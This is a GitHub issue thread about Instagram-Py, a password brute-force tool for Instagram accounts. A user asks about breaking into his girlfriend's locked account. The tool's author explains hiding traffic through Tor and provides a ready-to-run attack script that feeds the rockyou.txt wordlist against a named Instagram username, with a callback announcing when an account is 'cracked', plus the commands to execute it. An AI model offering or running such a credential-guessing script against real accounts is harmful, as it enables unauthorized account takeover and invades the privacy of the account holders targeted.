### ISSUE TITLE
Instagram-Py

### ISSUE THREAD

**Issue by RobAnKo** [antony-jr/ama#2]
Hi Antony!

I have one issue, leading to two questions I have to ask you.

1. You mentioned in a comment reply on wonderhowto nullbyte that "we can only hack an active target , Why ? Because brute force attack always blocks the account." 
The point is that I seriously have the best intentions;) I want to hack my gf's instagram account (with her approval) because she is can't log in anymore (reason unknown, old password that used to work doesn't work anymore, hacking improbable). The nonexistent support service won't help her (I guess it's bots), but she really wants to get it back. Is your tool applicable to the situation in which she can't access the account to verify the activity?

2. Do I have to use Kali Linux or is Ubuntu working as well if I install the necessary packages? If yes, which packages are these? I have a solid python background but didn't work with tor yet...

At last, a big THANK YOU for investing your time and brainsies to help the world by creating such useful tools and giving us the opportunity to aya:)

Best, 
Rob

**Comment by antony-jr** [comment]
Hey @RobAnKo 

> You mentioned in a comment reply on wonderhowto nullbyte that "we can only hack an active target , Why ? Because brute force attack always blocks the account."
The point is that I seriously have the best intentions;) I want to hack my gf's instagram account (with her approval) because she is can't log in anymore (reason unknown, old password that used to work doesn't work anymore, hacking improbable). The nonexistent support service won't help her (I guess it's bots), but she really wants to get it back. Is your tool applicable to the situation in which she can't access the account to verify the activity?

We can't really do anything about the verification. This tool was never made for recovery , It aims to be a pentest tool. Sorry.. :disappointed:  ( But in the near future it may support recovery ).

> Do I have to use Kali Linux or is Ubuntu working as well if I install the necessary packages? If yes, which packages are these? I have a solid python background but didn't work with tor yet...

Any Linux distro is good with **instagram-py** , It even works in windows and mac but Its too brief so I did not cover it in the article. **Tor** is just like apache server but this server helps you to hide your traffic from your ISP and we also use this to hop arround ( Its also called the dark web ) . For more information on installation , head to [the project page.](https://github.com/antony-jr/instagram-py) , There is a scripting and API support too.. If you like to send messages when your account is cracked.

**Comment by antony-jr** [comment]
If you are good with python , You can craft your own attack scripts with Instagram-Py Scripting... Like send a message to your phone when a account is hacked and multiple attack vectors in a single thread.

Refer [here](https://github.com/antony-jr/instagram-py#instagram-py-scripting) for more information. I'm pretty sure that this feature is amazing.

**Example:**
```
#!/usr/bin/instagram-py -s
# Only Supports Python 3
import os

def hacked_an_account(username , password):
   # Use Twilio API to Make a Message to our phone MayBe?
   print("Account Cracked!")
   return True

usernames = [ # Reserved Variable , Don't change the brackets too... 
  {
  "id" : "instatestgod__",
  "password_list" : "/home/antonyjr/Developer/.exploits/rockyou.txt" , # full path
  "countinue" : True, # Optional
  "callback" : hacked_an_account,  # Optional
  "verbose" : 0 # Optional
   } # , Can add more accounts here... 
]

# Attack starts here... Do not exit!
```

Mark it executable and execute...
```
 $ chmod +x your_attack_script.py
 $ ./your_attack_script.py # Works just like python.
```
